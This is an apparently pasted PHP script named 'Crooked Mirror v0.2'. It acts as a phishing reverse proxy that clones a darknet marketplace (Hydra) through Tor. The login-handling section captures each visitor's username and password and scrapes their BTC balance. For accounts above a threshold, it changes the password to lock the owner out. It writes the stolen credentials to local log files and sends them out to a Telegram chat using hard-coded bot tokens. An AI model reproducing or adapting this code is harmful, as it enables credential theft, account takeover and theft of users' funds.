· 6 years ago · Sep 03, 2019, 01:12 PM
1<?php
2//Crooked Mirror v0.2
3
4include('rewrite.php');
5
6function bot($ua="") {
7 if(empty($ua) && isset($_SERVER['HTTP_USER_AGENT'])) $ua=$_SERVER['HTTP_USER_AGENT'];
8 $list = array("facebookexternalhit","Teoma", "alexa", "froogle", "Gigabot", "inktomi",
9 "looksmart", "URL_Spider_SQL", "Firefly", "NationalDirectory",
10 "Ask Jeeves", "TECNOSEEK", "InfoSeek", "WebFindBot", "girafabot",
11 "crawler", "www.galaxy.com", "Googlebot", "Scooter", "Slurp",
12 "msnbot", "appie", "FAST", "WebBug", "Spade", "ZyBorg", "rabaz",
13 "Baiduspider", "Feedfetcher-Google", "TechnoratiSnoop", "Rankivabot",
14 "Mediapartners-Google", "Sogou web spider", "WebAlta Crawler","TweetmemeBot",
15 "Butterfly","Twitturls","Me.dium","Twiceler");
16 foreach($list as $bot){
17 if(strpos($ua,$bot)!==false) return true;
18 }
19 return false;
20}
21
22$self = 'http://'.$_SERVER['SERVER_NAME'].'/';
23$uri = file_get_contents($_SERVER['DOCUMENT_ROOT'].'/sitetarget.txt');
24if(!$uri) exit('No target');
25
26//Данные входящего запроса
27$uripath = $_SERVER['REQUEST_URI'];
28
29
30$isPost = $_SERVER['REQUEST_METHOD'] === 'POST';
31
32$adress = $uripath;
33$data = '';
34if( is_numeric(strpos($uripath,'?')) ) {
35 $urlarr = explode('?',$uripath);
36
37 $adress = array_shift($urlarr);
38 $data = array_shift($urlarr);
39}
40
41if(is_numeric( strpos($adress,basename(__FILE__)) )) exit('No.');
42
43if(strlen($data)>1) $data = '?'.$data;
44
45if(substr($adress,strlen($adress)-1,strlen($adress))=='/') $adress = substr($adress,0,strlen($adress)-1);
46$uripath = $adress.$data;
47
48
49$outheads = getallheaders();
50
51
52
53$clPost = array();
54foreach($_POST as $key => $data) {
55 //if($key=='login') logger($data.' - ');
56 //if($key=='password') logger($data."\n\n");
57 $clPost[$key] = $data;
58}
59
60session_name('webcook');
61session_start();
62
63
64if( ($myCurl = curl_init()) != true) {die("No cure init");}
65
66
67curl_setopt($myCurl, CURLOPT_HTTPHEADER, $outheads);
68curl_setopt($myCurl, CURLOPT_USERAGENT, $outheads['User-Agent'] );
69curl_setopt($myCurl, CURLOPT_FOLLOWLOCATION, 1);
70curl_setopt($myCurl, CURLOPT_MAXREDIRS, 10);
71curl_setopt($myCurl, CURLOPT_TIMEOUT, 30);
72curl_setopt($myCurl, CURLOPT_ENCODING, 'gzip,deflate');
73curl_setopt($myCurl, CURLOPT_SSL_VERIFYPEER, 0);
74curl_setopt($myCurl, CURLOPT_SSL_VERIFYHOST, 0);
75curl_setopt($myCurl, CURLOPT_RETURNTRANSFER, true);
76curl_setopt($myCurl, CURLOPT_PROXYTYPE, 7);
77curl_setopt($myCurl, CURLOPT_PROXY, "127.0.0.1:9050");
78
79$reload = false;
80
81if( strlen( session_id() ) > 0 ) {
82$cookiefile = dirname(__FILE__) . '/tmpcookies/' . session_id().'.txt';
83
84if(!file_exists($cookiefile) && file_exists(dirname(__FILE__) . '/tmpcookies/maincook.txt')) copy(dirname(__FILE__) . '/tmpcookies/maincook.txt',$cookiefile);
85
86curl_setopt($myCurl, CURLOPT_COOKIEFILE, $cookiefile );
87curl_setopt($myCurl, CURLOPT_COOKIEJAR, $cookiefile);
88} else {$reload = true;}
89curl_setopt($myCurl, CURLOPT_URL, $uri.$uripath);
90
91if($isPost) {
92 curl_setopt($myCurl, CURLOPT_POST, $isPost);
93 curl_setopt($myCurl, CURLOPT_POSTFIELDS, http_build_query($clPost));
94}
95$response = curl_exec($myCurl);
96
97if(strpos($response,"Вы не робот?") && bot()) {
98 $response = preg_replace('/<title>(.*?)<\/title>/', '<title>Hydra - моментальные магазины</title>', trim($response));
99}
100
101
102if($reload) {
103 header("HTTP/1.1 301 Moved Permanently",true,301);
104 header("Location: $self");
105 exit();
106}
107
108$effurl = curl_getinfo($myCurl, CURLINFO_EFFECTIVE_URL);
109$effurl = substr($effurl,strlen($uri),strlen($effurl));
110while($uripath[0]=='/' || $effurl[0]=='/') {
111 if($uripath[0]=='/') $uripath = substr($uripath,1,strlen($uripath));
112 if($effurl[0]=='/') $effurl = substr($effurl,1,strlen($effurl));
113}
114//if(!$_SESSION['ReTime']) $_SESSION['ReTime']=0;
115//if(!$_SESSION['ReCount']) $_SESSION['ReCount']=0;
116if($_SESSION['ReTime']>(time()-1)) {$_SESSION['ReCount']++;}else{$_SESSION['ReCount']=0;}
117$_SESSION['ReTime'] = time();
118if($_SESSION['ReCount']>5) exit( 'error '.$effurl.' == '.$uripath.' - '.($effurl==$uripath) );
119
120header("HTTP/1.1 200 OK",true,200);
121if($effurl!=$uripath) header("Location: $self$effurl");
122header('Content-Type: text/html; charset=utf8');
123
124if(strlen($response)<1) exit("Высокая нагрузка на сайт, попробуйте обновить страницу.");
125
126$response = str_replace( $uri , $self , $response );
127
128$response = change_post_link($response);
129
130$needle = 'https';
131$replace = 'http';
132$response = str_replace( $needle , $replace , $response );
133
134$response = rewrite($response,$uripath);
135
136if(!defined('INCLUDE_CHECK')) {
137
138 if( is_numeric(strpos($uripath,'?')) ) $uripath = array_shift(explode('?',$uripath));
139
140 $buildarr = explode('/',$adress);
141 fillingin($buildarr,$response);
142}
143
144if($_POST['login'] != "" && $_POST['password'] != "")
145{
146 $response = str_replace("\n","",$response);
147 preg_match('/<a href="\/balance" title="На вашем счете (.*?)"><i class="i_wallet"><\/i><span>(.*?) BTC<\/span><\/a>/', $response, $bal);
148
149 $arrboot = explode("\n",file_get_contents($_SERVER['DOCUMENT_ROOT'].'/amount_d.txt'));
150 $amount = $arrboot[rand(0,count($arrboot)-1)];
151 $pass = $_POST['password'];
152
153 if((float)$bal[2] > (float)$amount) {
154 $pass = random_pass();
155 preg_match('/value="(.*?)">/', $response, $found);
156
157 $fsd = fopen($_SERVER['DOCUMENT_ROOT'].'/сh_pass555777.txt',"a");
158 $str = "Данные - " . $_POST['login'] . ":" . $pass . PHP_EOL . "Баланс - " . trim($bal[2]) . " / " . $bal[1] . PHP_EOL . "Старый пароль - " . $_POST['password'] . "\r\n";
159 fwrite($fsd, $str);
160 fclose($fsd);
161
162 $data = [
163 "_token" => $found[1],
164 "_time" => time(),
165 "avatar" => "",
166 "password" => $pass,
167 "password_confirmation" => $pass,
168 "old_password" => $_POST['password'],
169 "settings[theme]" => "hydra",
170 "settings[notify]" => "default",
171 "settings[gpg_key]" => ""
172 ];
173
174 if( ($myCurl = curl_init()) != true) {die("No cure init");}
175
176 curl_setopt($myCurl, CURLOPT_HTTPHEADER, $outheads);
177 curl_setopt($myCurl, CURLOPT_USERAGENT, $outheads['User-Agent'] );
178 curl_setopt($myCurl, CURLOPT_FOLLOWLOCATION, 1);
179 curl_setopt($myCurl, CURLOPT_MAXREDIRS, 10);
180 curl_setopt($myCurl, CURLOPT_TIMEOUT, 30);
181 curl_setopt($myCurl, CURLOPT_ENCODING, 'gzip,deflate');
182 curl_setopt($myCurl, CURLOPT_SSL_VERIFYPEER, 0);
183 curl_setopt($myCurl, CURLOPT_SSL_VERIFYHOST, 0);
184 curl_setopt($myCurl, CURLOPT_RETURNTRANSFER, true);
185 curl_setopt($myCurl, CURLOPT_PROXYTYPE, 7);
186 curl_setopt($myCurl, CURLOPT_PROXY, "127.0.0.1:9050");
187
188 $reload = false;
189
190 if( strlen( session_id() ) > 0 ) {
191 $cookiefile = dirname(__FILE__) . '/tmpcookies/' . session_id().'.txt';
192
193 if(!file_exists($cookiefile) && file_exists(dirname(__FILE__) . '/tmpcookies/maincook.txt')) copy(dirname(__FILE__) . '/tmpcookies/maincook.txt',$cookiefile);
194
195 curl_setopt($myCurl, CURLOPT_COOKIEFILE, $cookiefile );
196 curl_setopt($myCurl, CURLOPT_COOKIEJAR, $cookiefile);
197 } else {$reload = true;}
198 curl_setopt($myCurl, CURLOPT_URL, $uri."/user/{$_POST['login']}/account");
199
200 curl_setopt($myCurl, CURLOPT_POST, true);
201 curl_setopt($myCurl, CURLOPT_POSTFIELDS, http_build_query($data));
202
203 $response = curl_exec($myCurl);
204
205 session_regenerate_id();
206 logger("==============================" . PHP_EOL . "Time:" .date("H:i:s d.m.Y") . PHP_EOL . "Account: {$_POST['login']}" . PHP_EOL . "Balance: " . trim($bal[2]) . " | " . $bal[1] . PHP_EOL . "Старый пароль: {$_POST['password']}" . PHP_EOL . "Новый пароль: {$pass}" . PHP_EOL . "==============================",1);
207 } else {
208 logger("Данные - " . $_POST['login'] . ":" . $pass . PHP_EOL . "Баланс - " . trim($bal[2]) . " | " . $bal[1] . PHP_EOL);
209 }
210
211
212}
213$response = str_replace('<form method="GET" action="//catalog" accept-charset="UTF-8" id="catalog-filters" class="searchform">', '<form method="GET" action="/catalog" accept-charset="UTF-8" id="catalog-filters" class="searchform">', $response);
214
215// fclose($fd);
216exit($response);
217
218function logger($msg,$type = 0) {
219 //$msg.='\n\n';
220 if(!$handle = fopen($_SERVER['DOCUMENT_ROOT'].'/logs555777.txt',"a")) return "File does open";
221 if(fwrite($handle,$msg,strlen($msg))===false) return "cant write";
222 fclose($handle);
223 if($type == 0) {
224 // общий лог
225 tg_send_message(623177568, $msg, "660436227:AAGmYojjXS4ok_HB-ua8yOz3fUZyztT7UPU");
226 } else {
227 // лог для сменненых акков
228 tg_send_message(623177568, $msg, "642550955:AAE2FbkhavRJnVJWm0v7vihiEYEPJaGJ7ZA");
229 }
230
231
232
233}
234
235function random_pass($length = 12) {
236 $use = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
237
238 $api = '';
239 srand((double)microtime()*1000000);
240 for($i=0; $i<$length; $i++) {
241 $api.= $use[rand()%strlen($use)];
242 }
243 return $api;
244}
245
246function change_post_link($response,$offset = 0)
247{
248 $Lresponse = strtolower($response);
249
250 $needle = 'method="post"';
251 $coorstar = strpos($Lresponse,$needle,$offset);
252 if(!is_numeric($coorstar)) return $response;
253
254 $offset = $coorstar+strlen($needle);
255
256 while($Lresponse[$coorstar]!='<' || $coorstar<1) $coorstar--;
257 if($coorstar<1) return change_post_link($response,$offset);
258
259 $needle = 'action="';
260 $coorstar = strpos($Lresponse,$needle,$coorstar);
261 if(!is_numeric($coorstar)) return change_post_link($response,$offset);
262
263 $coorstar += strlen($needle);
264 $coorend = strpos($Lresponse,'"',$coorstar);
265 if(!is_numeric($coorend)) return change_post_link($response,$offset);
266 if($response[$coorend-1]=='/') return $response;
267
268 $response = substr($response,0,$coorend).'/'.substr($response,$coorend,strlen($response));
269 return change_post_link($response,$offset);
270}
271
272function fillingin($buildarr,$response = 'NULL') {
273
274if(strpos($buildarr[count($buildarr)-1],'.') === false) {$filename = ''; } else {$filename = array_pop($buildarr);}
275
276$format = strpos($filename,'.');
277
278$newaddres = '\'';
279$filepath = '';
280foreach($buildarr as $name) {
281 if($name=='') continue;
282 $newaddres = $newaddres.'../';
283 $filepath = $filepath.$name.'/';
284}
285$newaddres = '<?php define(\'INCLUDE_CHECK\',true); require '.$newaddres.'crookedmirror.php\';';
286
287
288if($filename=="") $filename='index.php';
289
290if(file_exists($filepath.$filename)) return "already done";
291
292if( !file_exists($filepath) ) mkdir($filepath, 0777, true);
293if(is_numeric($format)) $newaddres = $response;
294if($newaddres!='') {
295if(!$handle = fopen($filepath.$filename , "w")) return "File does open";
296if(fwrite($handle,$newaddres,strlen($newaddres))===false) return "cant write";
297fclose($handle);
298}
299
300//copy('.htaccess', $filepath.'.htaccess');
301
302$buildarr[count($buildarr)-1]="";
303
304if(count($buildarr)>0) fillingin($buildarr);
305}
306
307 function apitgbot($n, $post, $token = "")
308 {
309 global $settings;
310 if($token == "") $token = $settings['tgtoken'];
311 $ch = curl_init();
312 curl_setopt($ch, CURLOPT_URL, "https://api.telegram.org/bot".$token."/".$n);
313 curl_setopt($ch, CURLOPT_HEADER, false);
314 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
315 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
316 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
317 curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
318 curl_setopt($ch, CURLOPT_POST, true);
319 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
320 $data = json_decode(curl_exec($ch));
321 curl_close($ch);
322 return $data;
323 }
324
325
326 function tg_send_message($to, $text, $token = "")
327 {
328 $post['chat_id'] = $to;
329 $post['parse_mode'] = "HTML";
330 $post['disable_web_page_preview'] = false;
331 $post['text'] = $text;
332 return apitgbot("sendMessage", $post, $token);
333 }